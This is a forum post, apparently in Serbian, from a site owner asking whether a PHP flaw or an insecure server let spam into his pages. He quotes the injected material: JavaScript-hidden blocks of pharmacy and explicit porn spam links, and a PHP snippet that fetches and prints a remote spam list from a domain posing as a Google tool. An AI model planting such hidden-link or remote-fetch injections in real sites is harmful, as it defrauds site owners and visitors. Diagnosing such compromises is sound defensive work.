PHP security propust ili supalj web server?Ovo je spam koji biva insertovan:
Code:
<SCRIPT LANGUAGE="JavaScript">
<!--
function stat() {document.getElementById('123').style.display = "none";}
//-->
</SCRIPT>
<div name=123 id="123"><A HREF="http://graphics.gr/pages/fpages/buy-cialis.html">buy cialis</A> | <A HREF="http://graphics.gr/pages/fpages/arimidex.html">arimidex</A> | <A HREF="http://graphics.gr/pages/fpages/zelnorm.html">zelnorm</A> | <A HREF="http://graphics.gr/pages/fpages/clomid.html">clomid</A> | <A HREF="http://graphics.gr/pages/fpages/emsam.html">emsam</A> | <A HREF="http://graphics.gr/pages/fpages/zestril.html">zestril</A> | <A HREF="http://graphics.gr/pages/fpages/clomid-sucess-stories.html">clomid sucess stories</A> | <A HREF="http://graphics.gr/pages/fpages/lasix.html">lasix</A> | <A HREF="http://graphics.gr/pages/fpages/nutrition-hgh.html">nutrition hgh</A> | <A HREF="http://graphics.gr/pages/fpages/cialis-no-prescription.html">cialis no prescription</A> | <A HREF="http://graphics.gr/pages/fpages/triphala.html">triphala</A> | <A HREF="http://graphics.gr/pages/fpages/zantac.html">zantac</A> | <A HREF="http://graphics.gr/pages/fpages/nexium-side-effects.html">nexium side effects</A> | <A HREF="http://graphics.gr/pages/fpages/oral-hgh.html">oral hgh</A> | <A HREF="http://graphics.gr/pages/fpages/generic-levitra.html">generic levitra</A> | <A HREF="http://graphics.gr/pages/fpages/aleve.html">aleve</A> | <A HREF="http://graphics.gr/pages/fpages/natural-breast-enhancement.html">natural breast enhancement</A> | <A HREF="http://graphics.gr/pages/fpages/toprol-xl.html">toprol xl</A> | <A HREF="http://graphics.gr/pages/fpages/accutane-acne-treatment.html">accutane acne treatment</A> | <A HREF="http://graphics.gr/pages/fpages/pravachol.html">pravachol</A></div>
<SCRIPT LANGUAGE="JavaScript">
<!--
stat();
//-->
</SCRIPT> <SCRIPT LANGUAGE="JavaScript">
<!--
function stat() {document.getElementById('1234').style.display = "none";}
//-->
</SCRIPT>
<div name=1234 id="1234"><A HREF="http://leithhistory.co.uk/maps/pages/sitemap56.html">free xxx long movies</A> | <A HREF="http://leithhistory.co.uk/maps/pages/sitemap66.html">nude teen links</A> | <A HREF="http://leithhistory.co.uk/maps/pages/sitemap51.html">teen cocksuckers</A> | <A HREF="http://leithhistory.co.uk/maps/pages/sitemap6.html">hardcore anal sex</A> | <A HREF="http://leithhistory.co.uk/maps/pages/sitemap53.html">how to train your dog to lick pussy</A> | <A HREF="http://leithhistory.co.uk/maps/pages/sitemap70.html">cheergirlsgallery</A> | <A HREF="http://leithhistory.co.uk/maps/pages/sitemap49.html">ukranian virgins</A> | <A HREF="http://leithhistory.co.uk/maps/pages/sitemap52.html">bdsm paddles</A> | <A HREF="http://leithhistory.co.uk/maps/pages/sitemap1.html">kiss lesbian teen</A> | <A HREF="http://leithhistory.co.uk/maps/pages/sitemap32.html">whore</A></div>
<SCRIPT LANGUAGE="JavaScript">
<!--
stat();
//-->
</SCRIPT> <SCRIPT LANGUAGE="JavaScript">
<!--
function stat() {document.getElementById('12345').style.display = "none";}
//-->
</SCRIPT>
<div name=12345 id="12345"><A HREF="http://globalsolutions.org/modules/mod/generic-nexium.html">generic nexium</A> | <A HREF="http://globalsolutions.org/mod...d/nexium-iv-drip-protocol.html">nexium iv drip protocol</A> | <A HREF="http://globalsolutions.org/mod...d-nexium-drug-interaction.html">ziac and nexium drug interaction</A> | <A HREF="http://globalsolutions.org/modules/mod/nexium-gastrectomy.html">nexium gastrectomy</A> | <A HREF="http://globalsolutions.org/modules/mod/nexium-and-joint-pain.html">nexium and joint pain</A> | <A HREF="http://globalsolutions.org/modules/mod/nexium-iv-stability.html">nexium iv stability</A> | <A HREF="http://globalsolutions.org/modules/mod/nexium-side-effect.html">nexium side effect</A> | <A HREF="http://globalsolutions.org/mod...-wean-your-body-of-nexium.html">can you wean your body of nexium</A> | <A HREF="http://globalsolutions.org/mod...od/how-to-wean-off-nexium.html">how to wean off nexium</A> | <A HREF="http://globalsolutions.org/mod...d/nexium-and-hypocalcemia.html">nexium and hypocalcemia</A></div>
<SCRIPT LANGUAGE="JavaScript">
<!--
stat();
//-->
</SCRIPT>
<SCRIPT LANGUAGE="JavaScript">
<!--
function stat() {document.getElementById('123').style.display = "none";}
//-->
</SCRIPT>
<div name=123 id="123"><A HREF="http://graphics.gr/pages/fpages/buy-cialis.html">buy cialis</A> | <A HREF="http://graphics.gr/pages/fpages/arimidex.html">arimidex</A> | <A HREF="http://graphics.gr/pages/fpages/zelnorm.html">zelnorm</A> | <A HREF="http://graphics.gr/pages/fpages/clomid.html">clomid</A> | <A HREF="http://graphics.gr/pages/fpages/emsam.html">emsam</A> | <A HREF="http://graphics.gr/pages/fpages/zestril.html">zestril</A> | <A HREF="http://graphics.gr/pages/fpages/clomid-sucess-stories.html">clomid sucess stories</A> | <A HREF="http://graphics.gr/pages/fpages/lasix.html">lasix</A> | <A HREF="http://graphics.gr/pages/fpages/nutrition-hgh.html">nutrition hgh</A> | <A HREF="http://graphics.gr/pages/fpages/cialis-no-prescription.html">cialis no prescription</A> | <A HREF="http://graphics.gr/pages/fpages/triphala.html">triphala</A> | <A HREF="http://graphics.gr/pages/fpages/zantac.html">zantac</A> | <A HREF="http://graphics.gr/pages/fpages/nexium-side-effects.html">nexium side effects</A> | <A HREF="http://graphics.gr/pages/fpages/oral-hgh.html">oral hgh</A> | <A HREF="http://graphics.gr/pages/fpages/generic-levitra.html">generic levitra</A> | <A HREF="http://graphics.gr/pages/fpages/aleve.html">aleve</A> | <A HREF="http://graphics.gr/pages/fpages/natural-breast-enhancement.html">natural breast enhancement</A> | <A HREF="http://graphics.gr/pages/fpages/toprol-xl.html">toprol xl</A> | <A HREF="http://graphics.gr/pages/fpages/accutane-acne-treatment.html">accutane acne treatment</A> | <A HREF="http://graphics.gr/pages/fpages/pravachol.html">pravachol</A></div>
<SCRIPT LANGUAGE="JavaScript">
<!--
stat();
//-->
</SCRIPT> <SCRIPT LANGUAGE="JavaScript">
<!--
function stat() {document.getElementById('1234').style.display = "none";}
//-->
</SCRIPT>
<div name=1234 id="1234"><A HREF="http://leithhistory.co.uk/maps/pages/sitemap56.html">free xxx long movies</A> | <A HREF="http://leithhistory.co.uk/maps/pages/sitemap66.html">nude teen links</A> | <A HREF="http://leithhistory.co.uk/maps/pages/sitemap51.html">teen cocksuckers</A> | <A HREF="http://leithhistory.co.uk/maps/pages/sitemap6.html">hardcore anal sex</A> | <A HREF="http://leithhistory.co.uk/maps/pages/sitemap53.html">how to train your dog to lick pussy</A> | <A HREF="http://leithhistory.co.uk/maps/pages/sitemap70.html">cheergirlsgallery</A> | <A HREF="http://leithhistory.co.uk/maps/pages/sitemap49.html">ukranian virgins</A> | <A HREF="http://leithhistory.co.uk/maps/pages/sitemap52.html">bdsm paddles</A> | <A HREF="http://leithhistory.co.uk/maps/pages/sitemap1.html">kiss lesbian teen</A> | <A HREF="http://leithhistory.co.uk/maps/pages/sitemap32.html">whore</A></div>
<SCRIPT LANGUAGE="JavaScript">
<!--
stat();
//-->
</SCRIPT> <SCRIPT LANGUAGE="JavaScript">
<!--
function stat() {document.getElementById('12345').style.display = "none";}
//-->
</SCRIPT>
<div name=12345 id="12345"><A HREF="http://globalsolutions.org/modules/mod/generic-nexium.html">generic nexium</A> | <A HREF="http://globalsolutions.org/mod...d/nexium-iv-drip-protocol.html">nexium iv drip protocol</A> | <A HREF="http://globalsolutions.org/mod...d-nexium-drug-interaction.html">ziac and nexium drug interaction</A> | <A HREF="http://globalsolutions.org/modules/mod/nexium-gastrectomy.html">nexium gastrectomy</A> | <A HREF="http://globalsolutions.org/modules/mod/nexium-and-joint-pain.html">nexium and joint pain</A> | <A HREF="http://globalsolutions.org/modules/mod/nexium-iv-stability.html">nexium iv stability</A> | <A HREF="http://globalsolutions.org/modules/mod/nexium-side-effect.html">nexium side effect</A> | <A HREF="http://globalsolutions.org/mod...-wean-your-body-of-nexium.html">can you wean your body of nexium</A> | <A HREF="http://globalsolutions.org/mod...od/how-to-wean-off-nexium.html">how to wean off nexium</A> | <A HREF="http://globalsolutions.org/mod...d/nexium-and-hypocalcemia.html">nexium and hypocalcemia</A></div>
<SCRIPT LANGUAGE="JavaScript">
<!--
stat();
//-->
</SCRIPT>
Dakle tipican spam sa mnogo linkova ka viagri i ostalim cudesima.
A ovo je kod index stranice:
Code:
<?php
include "str/header.php"; //ukljucivanje headera
switch ($izbor) {
case "home": include"strane/home.php";
break;
case "kontakt": include"strane/kontakt.php";
break;
.... jos case-ova.......
default: include"strane/home.php";
}
include "str/footer.php"; //ukljucivanje footera
?>
<?php
include "str/header.php"; //ukljucivanje headera
switch ($izbor) {
case "home": include"strane/home.php";
break;
case "kontakt": include"strane/kontakt.php";
break;
.... jos case-ova.......
default: include"strane/home.php";
}
include "str/footer.php"; //ukljucivanje footera
?>
S obzirom da se javlja i na ostalim sajtovima koji se hostuju na istom serveru, a koji su staticki html sajtovi onda ce ipak biti problem (ne)sigurnost web servera...
Komentar?
Uglavnom ovo je novost, u index.php se pojavilo:
Code:
if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://google-optimise.com/pagerank/google/03.dat");
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode("",file("http://google-optimise.com/pagerank/google/03.dat")); }
if($r) print $r;
if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://google-optimise.com/pagerank/google/03.dat");
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode("",file("http://google-optimise.com/pagerank/google/03.dat")); }
if($r) print $r;
Inteligentno su napravili redirect sa ovog google-optimise.com kako bi zbunili ljude da je to googel analytics-ov tool... ali 03.dat sadrzi listu spam adresa....
Sta je problem, supalj server ili ovaj php index ima neki propust koji ja ne vidim??
Re: PHP security propust ili supalj web server?